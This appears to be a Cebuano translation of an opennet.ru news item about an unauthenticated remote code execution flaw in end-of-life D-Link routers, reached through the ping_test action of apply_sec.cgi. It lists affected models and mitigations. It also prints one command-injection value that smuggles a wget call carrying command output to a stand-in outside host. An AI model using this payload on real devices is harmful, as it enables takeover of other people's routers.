Sa D-Link wireless routers delikado nga pagkahuyang (), nga nagtugot kanimo sa layo nga pagpatuman sa code sa kilid sa device pinaagi sa pagpadala sa usa ka espesyal nga hangyo ngadto sa "ping_test" handler, nga ma-access nga walay panghimatuud.
Makapainteres, sumala sa mga nag-develop sa firmware, ang "ping_test" nga tawag kinahanglan ipatuman lamang pagkahuman sa pag-authenticate, apan sa tinuud kini gitawag sa bisan unsang kaso, bisan unsa pa ang pag-log in sa web interface. Sa partikular, kung gi-access ang script nga apply_sec.cgi ug gipasa ang parameter nga "action = ping_test", ang script nag-redirect sa panid sa pag-authenticate, apan sa samang higayon gihimo ang aksyon nga may kalabotan sa ping_test. Aron ipatuman ang code, laing kahuyangan ang gigamit sa ping_test mismo, nga nagtawag sa ping utility nga walay hustong pagsusi sa pagkahusto sa IP address nga gipadala alang sa pagsulay. Pananglitan, sa pagtawag sa wget utility ug pagbalhin sa mga resulta sa "echo 1234" nga sugo ngadto sa usa ka eksternal nga host, ipiho lang ang parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ang presensya sa kahuyang opisyal nga nakumpirma sa mosunod nga mga modelo:
- DIR-655 nga adunay firmware 3.02b05 o mas tigulang;
- DIR-866L nga adunay firmware 1.03b04 o mas tigulang;
- DIR-1565 nga adunay firmware 1.01 o mas tigulang;
- DIR-652 (walay kasayuran bahin sa problema nga bersyon sa firmware nga gihatag)
Ang panahon sa suporta alang niini nga mga modelo natapos na, busa ang D-Link , nga dili magpagawas sa mga update alang kanila aron mawagtang ang kahuyang, wala magrekomendar sa paggamit niini ug nagtambag nga ilisan kini sa bag-ong mga himan. Ingon usa ka solusyon sa seguridad, mahimo nimong limitahan ang pag-access sa interface sa web sa kasaligan nga mga adres sa IP lamang.
Kini sa ulahi nadiskobrehan nga ang kahuyang mao usab mga modelo nga DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ug DIR-825, nagplano sa pagpagawas sa mga update nga wala pa mahibal-an.
Source: opennet.ru